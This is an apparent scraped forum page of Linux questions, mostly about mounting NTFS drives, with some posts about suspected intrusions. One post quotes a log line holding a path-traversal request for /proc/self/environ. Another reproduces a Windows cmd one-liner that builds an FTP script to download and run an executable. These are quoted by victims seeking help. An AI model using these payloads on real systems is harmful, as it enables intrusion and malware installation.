Ubuntu Security :: Mount.ntfs Ran On Its Own - Normal Or External Hack/break-in Attempt?
Aug 2, 2010
Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?
Apr 13, 2011
I have received the following log messages on my Debian Squeeze webserver:
Apr 13 15:16:37 vps suhosin[4699]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'controller' (attacker '75.126.235.115', file '/var/www/xxxxxxxxxxxxx.com
75.126.235.115 - - [13/Apr/2011:15:16:37 +0100] "GET /index.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8018 "-" "libwww-perl/6.01"
[code]....
Jul 30, 2009
Quote:
Originally Posted by Gödel
It gets me within a mile
How do I auto-mount the NTFS drives as a normal user without asking for a password... I need it, and one more thing: I want only two drives to auto-mount, and when I open the other drives it should ask for the password?...
Dec 4, 2010
I have installed Salix 13.1 LXDE version (Salix 13.1 is compatible with Slackware 13.1). I must use various external hard disks formatted with NTFS. The hard disks are automatically recognized and mounted with PCmanFM file manager, but only user root can write on them. How can I allow normal users to write on automounted external NTFS drives?
May 20, 2011
I want to mount NTFS by normal users, so I used the following entry in fstab:
/dev/sda6 /media/Mostafa ntfs-3g noauto,exec,rw,user 0 0
However, when I try to mount the partition I get the following error:
Unable to mount Mostafa
Error mounting: mount exited with exit code 1: helper failed with:
Error opening '/dev/sda6': Permission denied
Failed to mount '/dev/sda6': Permission denied
Please check '/dev/sda6' and the ntfs-3g binary permissions,
and the mounting user ID. More explanation is provided at
NTFS-3G Questions at Tuxera
[Code]...
Feb 19, 2010
I'm able to mount an NTFS file system as root user, but I want the same thing to be allowed to a normal user.
I'm not much familiar with the Linux environment, so please explain to me how to do that for a normal user.
Jan 31, 2010
Have a 1TB external USB hard drive I want to use on both Windows and Linux (Mythbuntu 9.10), so I thought the easiest way would be to format it with NTFS. Installed the NTFS-3G package and I'm able to read and write to the drive fine from Linux, however I have a few questions;
1) How do I configure Linux so that when it mounts the NTFS partition it is writeable for user, group and other (basically I want everyone to have read and write access)? Currently when the NTFS disk is mounted the permissions are restricted to the user only and I suspect I'll need to edit fstab for this, but don't have much experience here so need help with the specifics.
2) If my Linux PC is turned on with the external drive attached, the disk is not mounted until I double click on the icon on the desktop. Is there any way I can configure Linux so that it will automatically mount the external disk when booting?
Below is what is in my fstab file at present;
Quote:
# /etc/fstab: static file system information.
#
# -- This file has been automaticly generated by ntfs-config --
#
# <file system> <mount point> <type> <options> <dump> <pass>
[Code]....
May 6, 2011
I have a WD external 1TB USB 3.0 drive that I want to attach to a RHEL 5 computer. I don't want to format it to a FAT32 as I'm copying over about 530GB of data. What is the easy way to get the RHEL OS to recognize this drive? NTFS is not loaded on this system as I already checked.
Mar 14, 2010
I have an ntfs external hd; I can mount and use it fine, without entry in fstab, but not share stuff. That is to say: I can use nautilus / thunar to share folders on it without errors, but they are not accessible via the network. The issue may be that the mount point has permissions 700. I can solve that by
Code:
sudo mount -t ntfs-3g /dev/sdb1 /media/Databank -o umask=0,nls=utf8
or by setting umask=022 in fstab, but then I can't mount it as user anymore; if I set fstab to
Code:
/dev/sdb1 /media/Databank ntfs-3g user,umask=022,nls=utf8,defaults 0 0
I get this when I try to mount it as user in the filebrowser:
[code]....
Apr 6, 2010
I have successfully mounted my Win7 volume and my external hard drives NTFS volume as well. However, after modifying the fstab I seem to only be getting the win7 volume to auto-mount. Below is the contents of my fstab. /dev/sdf3 is not mounting. Again, it works no problem if I manually mount it.
# /etc/fstab: static file system information.
#
# <file system> <mount point> <type> <options> <dump> <pass>
[code]....
Jan 22, 2011
I have a 500GB external HDD. I have to mount it on my CentOS 4.8 machine (kernel-2.6.9.89EL 32-bit). The external HDD partitions are NTFS file system partitions. I have tried to mount the NTFS partition in Linux. But it's not done.
Mount partition with NTFS partition in Linux.
Jun 21, 2011
I'm having problems mounting my NTFS external hard drive.
dmesg:
Code:
padlock: VIA PadLock Hash Engine not detected.
PPP MPPE Compression module registered
PPP BSD Compression module registered
PPP Deflate Compression module registered
npviewer.bin[5405]: segfault at ff99cd48 ip ff99cd48 sp bfc8afac error 4
usb 4-2: new high speed USB device using ehci_hcd and address 5
[code].....
Apr 10, 2011
My external HDD of 750GB brings me an error during mounting! It asks me to get to Windows and reboot twice or cmd chkdsk/f, of which when I do it the only option that comes is to format it. I do not wanna format it coz it's with a lot of ma useful data! Am using Debian, just asking if it's possible to retrieve ma data from it using commands per se, and what are those?
Dec 24, 2010
Kubuntu 10.10 nicely mounts vfat external media as UTF-8, see for example my disk-on-key:
Code:
/dev/sdd1 on /media/DOTANCOHEN type vfat (rw,nosuid,nodev,uhelper=udisks,uid=1002,gid=1002,shortname=mixed,dmask=0077,utf8=1,showexec)
However, NTFS external media is not UTF-8, and it is giving this user a hassle as her native language cannot be represented in ASCII:
Code:
[Code]....
Dec 16, 2010
I am trying to mount an external USB hard drive. I'm using Debian Lenny 5. I tried to right-click on the hard drive and then select the mount command inside the GNOME desktop environment but it gives me an error. Is there an easy way to mount and unmount this hard drive? The hard drive itself is formatted from the factory in NTFS. I'm going to leave it in this file format as I need to use it with Windows machines as well.
Jan 11, 2010
I am currently taking my CCNA course. I have come to realize that to be a great Admin and secure a company's data, you first have to know its weakness. Now I have become aware of a few programs like John the ripper telnet password crack, nmap, and the like. Well I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in. To get my website info I used:
[Code]...
Jul 20, 2010
I was running Ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a ':'. The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a Windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another person's computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
Mar 4, 2010
Can mount.ntfs and mount.ntfs-3g reside simultaneously?
Whilst accessing an external NTFS drive mount.ntfs takes up a lot of CPU. I am not sure if it's mounting the drive using mount.ntfs or mount.ntfs-3g? How do I find out, and if they coexist how do I make the default mount drive ntfs-3g?
Sep 1, 2010
Is there a way in Lucid to require a sudo password to mount all external drives (e.g. thumb drives, USB CD/DVD drives, USB hard drives)?
Nov 15, 2010
I've been running Linux for a year on our family computers (one desktop, one laptop and two netbooks). I've run into a problem with the encrypted ext4 partition (270GB) on a LaCie external hard drive which also has an NTFS partition (50GB) which is not encrypted. First two times I tried using the encrypted ext4 partition (from two different computers) it worked fine but now I can't access it at all. I can still access the NTFS partition.
Encrypted external hard drive partition will unlock but won't mount (or unmount). The computer says "Opening 320GB Hard Disk" but after a minute says, "Unable to mount location. DBus error org.freedesktop.DBus.Error.NoReply"
Disk utility (GUI for gparted I believe) states that the encrypted partition (/dev/sdb1) is unlocked and the underlying partition (/dev/dm-0) is not mounted but it has a "busy circle sign" on it that will not turn off. The NTFS partition on the same drive mounts and accesses normally.
But if I try to unmount the NTFS partition, it says: "Unable to stop drive. One or more partitions are busy on /dev/sdb"
If I try to shut down the computer, it is unable to shut down because (I assume) it can't shut down that drive either. So I have to just turn off the computer.
fdisk states that /dev/dm-0 doesn't have a valid partition table [full output attached]
fsck suggests: "Filesystem mounted or opened exclusively by another program?"
ps axuf shows some processes running on /dev/dm-0 but killing them doesn't release the drive either. [full output attached]
I checked /etc/blkid.tab (suggested in one vaguely related thread) and there's no actual file, only a broken link pointing to /dev/.blkid.tab (which doesn't exist). I tried deleting this link and rebooting but that didn't change anything.
When I finally gave up my data as lost, I tried to format the partition (using Disk Utility) and it refused saying, "One or more block devices are holding /dev/sdb"
Jul 18, 2010
Just installed 11.3 on my computer, however when I connect an external NTFS harddisk I receive an error message. When I open dolphin to connect to an internal NTFS partition I receive the message:
org.freedesktop.Hal.Device.PermissionDeniedByPolicy: org.freedesktop.hal.storage.mount-fixed auth_admin_keep_always <--
Anyone having an idea how I can fix this?
Nov 11, 2010
If root is disabled by default, how is it possible that someone managed to SSH into my computer using root? I never enable/set password for root, it's always left as the default as per a fresh install and I always use sudo for any admin tasks.
Auth.log
First there are a whole load of failed attempts then...
Code:
Nov 8 11:07:32 Morris-Desktop sshd[3601]: Failed password for root from 94.243.50.53 port 4360 ssh2
[code]...
Mar 6, 2010
I want to enable Advanced NTFS-3G support (permissions and users) automatically from the fstab entry.
Jul 16, 2010
I noticed a very very high cpu usage on my webserver. All four CPUs were running on 100%.
Top shows several perl processes from apache that run for a long time, with a high %CPU.
Since the server was fc10, I did a fresh installation to fc13, and the fresh installation didn't have this issue. Then I loaded back all the user-data, and it started again.
Several, 4, 6, 8, ... 100 perl processes from apache.
lsof -p with the pid of such a process
Code:
The established connection is sometimes "proud2pirate.com" which is a non-existing domain.
Apr 4, 2011
The libxml2 update specified by CVE-2010-4494 causes a notification that it will break Adobe AIR and TweetDeck on my machine. How can I blacklist this update so it won't keep showing up in the Updater applet? The applet says I should go into Yast and manually apply the update. When I do that and tell it not to apply the update, Yast exits and the Updater applet just tells me the update is still pending. I want to get rid of the update at least temporarily until Adobe fixes the dependency (assuming they ever do).
This is a major problem for me as I clearly don't intend to uninstall TweetDeck and AIR just for some security patch. Why didn't openSUSE test this patch for AIR compatibility?
Jun 29, 2011
While investigating my localhost access logs during an investigation to resolve locking myself out of my own server(!) I noticed this recent access attempt from a proxy referrer. I wouldn't expect this on a local server - currently set to listen on 127.0.01. The request was 403 forbidden, but surely the request should not have even reached this far? Is this an example of an unauthorised access attempt? I don't think it is me because all of my usual access requests are in moz 5 and I'm logged in to Linux currently.
Note: please do not click this link as I do not know where it leads ^^^^! (and I don't know how to disable it on this forum)
May 22, 2011
love security/pentest tools. This script adds ALL the tools from the Security Spin, plus Metasploit. Feel free to modify it if need be.
May 30, 2010
Is it possible to install security lab menu on a normal Fedora 13 installation? I don't want to use security spin.
Oct 22, 2010
On my server I sometimes log in from my home, where I have an internet connection which does not have a static IP; each time I switch on my modem a dynamic IP is generated. I see in auth.log logs of the following lines:
Quote:
reverse mapping checking getaddrinfo for kkts-kk-dynamic-01.1.168.192.some_broadband.in [192.168.1.2] failed - POSSIBLE BREAK-IN ATTEMPT
Accepted publickey for root from 192.168.1.2 port 22852 ssh2
whenever I log in to my server from home. In this case I do know that it was me who logged in, but still, why do I see such a log? What is this complaining about?
Nov 19, 2010
Just like the title says, if I were to try to run anything through gksu and accidentally put in an incorrect password, instead of the gksu window coming up again, it would just terminate.
Code:
theyain@theyain-laptop:~$ gksu update-manager
GNOME_SUDO_PASSGNOME_SUDO_PASSSorry, try again.
sudo: 3 incorrect password attempts
What's interesting is that it gives me the sudo error after only one incorrect password attempt.